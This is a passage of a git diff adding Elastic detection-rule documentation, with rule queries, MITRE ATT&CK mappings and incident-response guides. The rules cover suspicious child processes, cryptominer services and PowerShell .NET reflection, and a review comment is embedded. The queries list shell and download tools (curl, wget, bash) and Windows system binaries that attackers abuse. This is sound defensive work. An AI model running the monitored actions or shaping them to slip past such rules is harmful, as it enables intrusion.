+* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 205 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Java Child Process + +This rule identifies a suspicious child process of the Java interpreter process. It may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a Java specific vulnerability. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. +- Examine the command line to determine if the command executed is potentially harmful or malicious. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of process and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and event.type:("start" or "process_started") and process.parent.name:"java" and process.name:( + "sh" or "bash" or "dash" or "ksh" or "tcsh" or "zsh" or "curl" or "wget" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc new file mode 100644 index 0000000000..eed959d5c9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc 
@@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process]] +=== Suspicious Managed Code Hosting Process + +Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.type == "start" and + process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] + [file where host.os.type == "windows" and event.type != "deletion" and + file.name : ("wscript.exe.log", + "cscript.exe.log", + "mshta.exe.log", + "wmic.exe.log", + "svchost.exe.log", + "dllhost.exe.log", + "cmstp.exe.log", + "regsvr32.exe.log")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc new file mode 100644 index 0000000000..f43d0d1042 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc 
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-suspicious-mining-process-creation-event]] +=== Suspicious Mining Process Creation Event + +Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and +event.action : ("creation", "file_create_event") and +file.name : ("aliyun.service", "moneroocean_miner.service", "c3pool_miner.service", "pnsd.service", "apache4.service", "pastebin.service", "xvf.service") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc new file mode 100644 index 0000000000..7a21c1b638 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc 
@@ -0,0 +1,157 @@ +[[prebuilt-rule-8-10-5-suspicious-ms-office-child-process]] +=== Suspicious MS Office Child Process + +Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/vulnerability-summary-follina + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious MS Office Child Process + +Microsoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of. + +This rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. 
+ - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe", "outlook.exe") and + process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", + "cmd.exe", "cmstp.exe", "control.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", "dsquery.exe", "forfiles.exe", + "fsi.exe", "ftp.exe", "gpresult.exe", "hostname.exe", "ieexec.exe", "iexpress.exe", "installutil.exe", "ipconfig.exe", + "mshta.exe", "msxsl.exe", "nbtstat.exe", "net.exe", "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "odbcconf.exe", + "ping.exe", "powershell.exe", "pwsh.exe", "qprocess.exe", "quser.exe", "qwinsta.exe", "rcsi.exe", "reg.exe", "regasm.exe", + "regsvcs.exe", "regsvr32.exe", "sc.exe", 
"schtasks.exe", "systeminfo.exe", "tasklist.exe", "tracert.exe", "whoami.exe", + "wmic.exe", "wscript.exe", "xwizard.exe", "explorer.exe", "rundll32.exe", "hh.exe", "msdt.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc new file mode 100644 index 0000000000..6d34ee3055 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc 
@@ -0,0 +1,156 @@ +[[prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process]] +=== Suspicious MS Outlook Child Process + +Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious MS Outlook Child Process + +Microsoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite. + +This rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve recently opened files received via email and opened by the user that could cause this behavior. 
Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "outlook.exe" and + process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", + "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", + "dsquery.exe", "forfiles.exe", "fsi.exe", "ftp.exe", "gpresult.exe", "hostname.exe", "ieexec.exe", + "iexpress.exe", "installutil.exe", "ipconfig.exe", "mshta.exe", "msxsl.exe", "nbtstat.exe", "net.exe", + "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "odbcconf.exe", "ping.exe", "powershell.exe", + "pwsh.exe", "qprocess.exe", "quser.exe", "qwinsta.exe", "rcsi.exe", "reg.exe", "regasm.exe", + "regsvcs.exe", "regsvr32.exe", "sc.exe", "schtasks.exe", "systeminfo.exe", "tasklist.exe", + "tracert.exe", "whoami.exe", "wmic.exe", "wscript.exe", "xwizard.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: 
TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc new file mode 100644 index 0000000000..472cb5a646 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc 
@@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-suspicious-net-code-compilation]] +=== Suspicious .NET Code Compilation + +Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("csc.exe", "vbc.exe") and + process.parent.name : ("wscript.exe", "mshta.exe", "cscript.exe", "wmic.exe", "svchost.exe", "rundll32.exe", "cmstp.exe", "regsvr32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Compile After Delivery +** ID: T1027.004 +** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** 
Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc new file mode 100644 index 0000000000..8f9dc464ad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc 
@@ -0,0 +1,166 @@ +[[prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell]] +=== Suspicious .NET Reflection via PowerShell + +Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious .NET Reflection via PowerShell + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the script using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + "[System.Reflection.Assembly]::Load" or + "[Reflection.Assembly]::Load" + ) and not + powershell.file.script_block_text : ( + ("CommonWorkflowParameters" or "RelatedLinksHelpInfo") and + "HelpDisplayStrings" + ) and not + (powershell.file.script_block_text : + ("Get-SolutionFiles" or "Get-VisualStudio" or "Select-MSBuildPath") and + not file.name : "PathFunctions.ps1" + ) + and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Dynamic-link Library Injection +** ID: T1055.001 +** Reference URL: https://attack.mitre.org/techniques/T1055/001/ +* Sub-technique: +** Name: Portable Executable Injection +** ID: T1055.002 +** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ 
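Review bot: the last bullet under "Possible investigation steps" in prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc ends with "to the target host after the registry modification", but this rule keys on `powershell.file.script_block_text`, not on any registry event; the phrase reads as carried over from another guide and should say "after the suspicious script execution" or similar. The page also states no data prerequisite: `powershell.file.script_block_text` is populated from PowerShell script block logging (event 4104), so a short setup line saying that logging must be enabled, as the "Data Source: PowerShell Logs" tag implies, would stop the rule being deployed where it has no data. Lastly, the trailing `not user.id : "S-1-5-18"` drops every script block executed as LocalSystem; that is a deliberate coverage trade-off rather than a tuning exception and deserves a sentence in the false positive section.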
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc new file mode 100644 index 0000000000..dc212d079c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc 
@@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable]] +=== Suspicious Network Activity to the Internet by Previously Unknown Executable + +This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* filebeat-* +* packetbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-59m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + 